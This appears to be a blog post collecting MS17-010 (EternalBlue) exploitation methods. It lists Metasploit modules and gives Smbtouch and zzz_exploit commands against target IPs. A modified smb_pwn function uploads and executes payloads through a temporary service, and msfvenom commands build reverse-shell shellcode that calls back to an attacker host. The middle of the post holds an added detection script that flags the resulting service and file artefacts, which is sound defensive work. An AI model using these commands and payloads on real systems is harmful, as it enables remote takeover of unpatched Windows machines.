Preface
In this post I record several methods I have used when exploiting the MS17-010 vulnerability. The tools can be obtained by leaving me a comment.
MSF
MSF modules for MS17-010:
exploit/windows/smb/ms17_010_eternalblue
auxiliary/admin/smb/ms17_010_command
auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_eternalblue_win8
exploit/windows/smb/ms17_010_psexec
exploit/windows/smb/smb_doublepulsar_rce
Smbtouch
Run the smbtouch.exe tool to check whether the target machine can be attacked with the other payloads. The tool only supports machines older than Windows Server 2012.
Smbtouch-1.1.1.exe --TargetIp 172.16.94.189 --TargetPort 445
zzz_exploit.py
Using the packaged exe
Usage: zzz_exploit.exe <ip> <exe-parameter> [pipe_name]
Example: zzz_exploit.exe 172.16.94.211
Example: zzz_exploit.exe 172.16.94.211 sc.exe
Example: the command used in practice was zzz_exploit.exe 192.11.22.82 -Start
Using the Python script
python zzz_exploit.py 172.16.94.211
Checking the named pipe
python checker.py 172.16.94.211
Note: the script defaults to the exploit8 attack module; to attack a Windows 7 PC, replace the smb_pwn function in the script with the following function:
    def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Prove write access by creating an empty file in the root of the C$ share
        print('creating file c:\\pwned.txt on the target')
        tid2 = smbConn.connectTree('C$')
        fid2 = smbConn.createFile(tid2, '/pwned.txt')
        smbConn.closeFile(tid2, fid2)
        smbConn.disconnectTree(tid2)

        # Upload a local executable over SMB and launch it through a temporary service
        smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')
        service_exec(conn, r'cmd /c c:\shell.exe')
        smb_send_file(smbConn, '/tmp/1.exe', 'C', 'users/public/update.exe')
        service_exec(conn, r'cmd /c c:\users\public\update.exe')
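The function above leaves artefacts a defender can look for on the target: a new service whose ImagePath is "cmd /c" followed by an executable dropped in the drive root or under C:\users\public, and a file written by the SMB server, which Sysmon attributes to the System process. The following is an added detection example, not code from the original post or from zzz_exploit; it scans constructed Windows event records (Service Control Manager event 7045 and Sysmon event 11) whose field names are assumed to have been flattened into dicts already.

```python
import re
from typing import Dict, List

# Constructed sample events, not real telemetry: two 7045 (service installed)
# records and two Sysmon 11 (file created) records, already flattened to dicts.
SAMPLE_EVENTS: List[Dict] = [
    {"event_id": 7045, "host": "FILESRV01", "service_name": "WinUpdateSvc",
     "image_path": r"cmd /c c:\users\public\update.exe"},
    {"event_id": 7045, "host": "FILESRV01", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"event_id": 11, "host": "FILESRV01", "image": "System",
     "target_filename": r"C:\pwned.txt"},
    {"event_id": 11, "host": "FILESRV01", "image": r"C:\Windows\explorer.exe",
     "target_filename": r"C:\Users\bob\notes.txt"},
]

# Service binary wrapped in a shell, the pattern service_exec() produces with "cmd /c ...".
CMD_WRAPPER = re.compile(r'^"?(?:[a-z]:\\windows\\system32\\)?cmd(?:\.exe)?"?\s+/[ck]\s', re.I)
# A file directly in a drive root, e.g. c:\pwned.txt or c:\shell.exe.
DRIVE_ROOT_FILE = re.compile(r"^[a-z]:\\[^\\]+$")
# Locations a remote or low-privileged writer can reach; service binaries rarely live there.
WRITABLE_DIRS = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp", r"c:\temp")

def analyse_service_install(ev: Dict) -> List[str]:
    """Reasons a 7045 record looks like a psexec-style service used to run a dropped file."""
    reasons = []
    path = ev["image_path"].strip()
    if CMD_WRAPPER.match(path):
        reasons.append("service binary wrapped in cmd /c")
    binary = CMD_WRAPPER.sub("", path).strip('"').lower()
    if binary.startswith(WRITABLE_DIRS) or DRIVE_ROOT_FILE.match(binary):
        reasons.append("service binary in user-writable or drive-root location: " + binary)
    return reasons

def analyse_file_create(ev: Dict) -> List[str]:
    """Reasons a Sysmon 11 record looks like a file dropped over SMB into the drive root."""
    target = ev["target_filename"].lower()
    # Writes arriving through srv.sys are attributed to the System process.
    if ev["image"].lower() == "system" and DRIVE_ROOT_FILE.match(target):
        return ["System process wrote a file into the drive root: " + target]
    return []

def find_ms17_010_followon(events: List[Dict]) -> List[Dict]:
    """Return one alert per event that matches the post-exploitation artefacts above."""
    alerts = []
    for ev in events:
        handlers = {7045: analyse_service_install, 11: analyse_file_create}
        reasons = handlers.get(ev["event_id"], lambda _: [])(ev)
        if reasons:
            alerts.append({"host": ev["host"], "event_id": ev["event_id"], "reasons": reasons})
    return alerts
```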
Shellcode
x64
If you use an x64 payload, be sure to select the x64 version when generating it in CS; otherwise the target will simply reboot.
$ nasm -f bin ./eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x64 --format raw -o sc_x64_payload.bin
$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
x86
$ nasm -f bin ./eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x86 --format raw -o sc_x86_payload.bin
$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
Merging both architectures into one blob:
$ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin